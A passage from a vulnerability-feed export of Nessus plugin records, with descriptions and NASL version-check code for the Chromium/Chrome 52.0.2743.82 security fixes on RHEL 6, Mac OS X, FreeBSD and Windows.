script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'52.0.2743.82', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, 
{"lastseen": "2023-05-18T14:25:50", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-1706, CVE-2016-1708, CVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127, CVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131, CVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135, CVE-2016-5136, CVE-2016-5137, CVE-2016-1705)", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2016:1485)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-1485.NASL", "href": "https://www.tenable.com/plugins/nessus/92552", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1485. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92552);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_xref(name:\"RHSA\", value:\"2016:1485\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2016:1485)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. 
(CVE-2016-1706, CVE-2016-1708,\nCVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127,\nCVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131,\nCVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135,\nCVE-2016-5136, CVE-2016-5137, CVE-2016-1705)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2016-5134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5137\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1485\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"chromium-browser-debuginfo-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-52.0.2743.82-1.el6\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:06", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 52.0.2743.82. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a remote attacker to cause a denial of service condition or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in PPAPI due to a failure to validate the origin of IPC messages to the plugin broker process. An unauthenticated, remote attacker can exploit this to bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a failure to consider object lifetimes during progress observation. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get() function in data/byte_array.cc due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to prevent window creation by a deferred frame. 
A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due to a failure to disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the previousLinePosition() function. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8 due to a failure to prevent API interceptors from modifying a store target without setting a property. A remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of left-trimmed objects. An unauthenticated, remote attacker can exploit this, via crafted JavaScript code, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two forward navigations that compete in different frames. A remote attacker can exploit this to conduct a URL spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the xmlXPtrRangeToFunction() function. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service Workers subsystem due to a failure to properly implement the Secure Contexts specification during decisions about whether to control a subframe. 
A remote attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information during proxy authentication that allows a man-in-the-middle attacker to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC) feature due to a failure to ensure that URL information is restricted to a scheme, host, and port. A remote attacker can exploit this to disclose credentials by operating a server with a PAC script. (CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due to a failure to consider referrer-policy information inside an HTML document during a preload request. A remote attacker can exploit this to bypass the Content Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows a remote attacker to dereference already freed memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to determine whether a specific HTTP Strict Transport Security (HSTS) web site has been visited by reading a CSP report. 
(CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "nessus", "title": "Google Chrome < 52.0.2743.82 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_52_0_2743_82.NASL", "href": "https://www.tenable.com/plugins/nessus/92629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92629);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2016-1705\",\n \"CVE-2016-1706\",\n \"CVE-2016-1708\",\n \"CVE-2016-1709\",\n \"CVE-2016-1710\",\n \"CVE-2016-1711\",\n \"CVE-2016-5127\",\n \"CVE-2016-5128\",\n \"CVE-2016-5129\",\n \"CVE-2016-5130\",\n \"CVE-2016-5131\",\n \"CVE-2016-5132\",\n \"CVE-2016-5133\",\n \"CVE-2016-5134\",\n \"CVE-2016-5135\",\n \"CVE-2016-5136\",\n \"CVE-2016-5137\"\n );\n script_bugtraq_id(92053);\n\n script_name(english:\"Google Chrome < 52.0.2743.82 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 52.0.2743.82. 
It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple unspecified vulnerabilities exist that allow a\n remote attacker to cause a denial of service condition\n or possibly have other impact via unknown vectors.\n (CVE-2016-1705)\n\n - A sandbox protection bypass vulnerability exists in\n PPAPI due to a failure to validate the origin of IPC\n messages to the plugin broker process. An\n unauthenticated, remote attacker can exploit this to\n bypass the sandbox. (CVE-2016-1706)\n\n - A use-after-free error exists in Extensions due to a\n failure to consider object lifetimes during progress\n observation. An unauthenticated, remote attacker can\n exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-1708)\n\n - An array indexing error exists in the ByteArray::Get()\n function in data/byte_array.cc due to improper \n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a heap-based\n buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1709)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to prevent window creation by a deferred\n frame. A remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-1710)\n\n - A same-origin bypass vulnerability exists in Blink due\n to a failure to disable frame navigation during a detach\n operation on a DocumentLoader object. A remote attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1711)\n\n - A use-after-free error exists in Blink in the\n previousLinePosition() function. An unauthenticated,\n remote attacker can exploit this, via crafted JavaScript\n code involving an @import at-rule in a Cascading Style\n Sheets (CSS) token sequence in conjunction with a\n rel=import attribute of a LINK element, to cause a\n denial of service condition or the execution of\n arbitrary code. 
(CVE-2016-5127)\n\n - A same-origin bypass vulnerability exists in Google V8\n due to a failure to prevent API interceptors from\n modifying a store target without setting a property. A\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5128)\n\n - A flaw exists in V8 due to improper processing of\n left-trimmed objects. An unauthenticated, remote\n attacker can exploit this, via crafted JavaScript code,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5129)\n\n - A flaw exists that is triggered when handling two\n forward navigations that compete in different frames. A\n remote attacker can exploit this to conduct a URL\n spoofing attack. (CVE-2016-5130)\n\n - A use-after-free error exists in libxml2 in the\n xmlXPtrRangeToFunction() function. An unauthenticated,\n remote attacker can exploit this to dereference already\n freed memory, resulting in the execution of arbitrary\n code. (CVE-2016-5131)\n\n - A same-origin bypass vulnerability exists in the Service\n Workers subsystem due to a failure to properly implement\n the Secure Contexts specification during decisions about\n whether to control a subframe. A remote attacker can\n exploit this to bypass the same-origin policy.\n (CVE-2016-5132)\n\n - A flaw exists in the handling of origin information\n during proxy authentication that allows a\n man-in-the-middle attacker to spoof a\n proxy-authentication login prompt or trigger incorrect\n credential storage by modifying the client-server data\n stream. (CVE-2016-5133)\n\n - A validation flaw exists in the Proxy Auto-Config (PAC)\n feature due to a failure to ensure that URL information\n is restricted to a scheme, host, and port. A remote\n attacker can exploit this to disclose credentials by\n operating a server with a PAC script. 
(CVE-2016-5134)\n\n - A cross-origin bypass vulnerability exists in Blink due\n to a failure to consider referrer-policy information\n inside an HTML document during a preload request. A\n remote attacker can exploit this to bypass the Content\n Security Policy (CSP) protection mechanism.\n (CVE-2016-5135)\n\n - A use-after-free error exists in Extensions that allows\n a remote attacker to dereference already freed memory,\n resulting in the execution of arbitrary code with\n elevated privileges. (CVE-2016-5136)\n\n - An information disclosure vulnerability exists in Blink\n when handling HTTP vs HTTPs ports in source expressions.\n An unauthenticated, remote attacker can exploit this to\n determine whether a specific HTTP Strict Transport\n Security (HSTS) web site has been visited by reading a\n CSP report. (CVE-2016-5137)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c7c32d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 52.0.2743.82 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/29\");\n\n 
script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'52.0.2743.82', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:04", "description": "Google Chrome Releases reports :\n\n48 security fixes in this release, including :\n\n- [610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to Pinkie Pie xisigr of Tencent's Xuanwu Lab\n\n- [613949] High CVE-2016-1708: Use-after-free in Extensions. Credit to Adam Varsan\n\n- [614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit to ChenQin of Topsec Security Team\n\n- [616907] High CVE-2016-1710: Same-origin bypass in Blink. Credit to Mariusz Mlynski\n\n- [617495] High CVE-2016-1711: Same-origin bypass in Blink. Credit to Mariusz Mlynski\n\n- [618237] High CVE-2016-5127: Use-after-free in Blink. Credit to cloudfuzzer\n\n- [619166] High CVE-2016-5128: Same-origin bypass in V8. Credit to Anonymous\n\n- [620553] High CVE-2016-5129: Memory corruption in V8. Credit to Jeonghoon Shin\n\n- [623319] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar\n\n- [623378] High CVE-2016-5131: Use-after-free in libxml. Credit to Nick Wellnhofer\n\n- [607543] Medium CVE-2016-5132: Limited same-origin bypass in Service Workers. Credit to Ben Kelly\n\n- [613626] Medium CVE-2016-5133: Origin confusion in proxy authentication. 
Credit to Patch Eudor\n\n- [593759] Medium CVE-2016-5134: URL leakage via PAC script. Credit to Paul Stone\n\n- [605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\nCredit to kingxwy\n\n- [625393] Medium CVE-2016-5136: Use after free in extensions. Credit to Rob Wu\n\n- [625945] Medium CVE-2016-5137: History sniffing with HSTS and CSP.\nCredit to Xiaoyin Liu\n\n- [629852] CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives.", "cvss3": {}, "published": "2016-07-25T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_6FAE9FE1504811E68AA73065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/92537", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92537);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more 
security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n48 security fixes in this release, including :\n\n- [610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to\nPinkie Pie xisigr of Tencent's Xuanwu Lab\n\n- [613949] High CVE-2016-1708: Use-after-free in Extensions. Credit to\nAdam Varsan\n\n- [614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly. Credit\nto ChenQin of Topsec Security Team\n\n- [616907] High CVE-2016-1710: Same-origin bypass in Blink. Credit to\nMariusz Mlynski\n\n- [617495] High CVE-2016-1711: Same-origin bypass in Blink. Credit to\nMariusz Mlynski\n\n- [618237] High CVE-2016-5127: Use-after-free in Blink. Credit to\ncloudfuzzer\n\n- [619166] High CVE-2016-5128: Same-origin bypass in V8. Credit to\nAnonymous\n\n- [620553] High CVE-2016-5129: Memory corruption in V8. Credit to\nJeonghoon Shin\n\n- [623319] High CVE-2016-5130: URL spoofing. Credit to Wadih Matar\n\n- [623378] High CVE-2016-5131: Use-after-free in libxml. Credit to\nNick Wellnhofer\n\n- [607543] Medium CVE-2016-5132: Limited same-origin bypass in Service\nWorkers. Credit to Ben Kelly\n\n- [613626] Medium CVE-2016-5133: Origin confusion in proxy\nauthentication. Credit to Patch Eudor\n\n- [593759] Medium CVE-2016-5134: URL leakage via PAC script. Credit to\nPaul Stone\n\n- [605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\nCredit to kingxwy\n\n- [625393] Medium CVE-2016-5136: Use after free in extensions. 
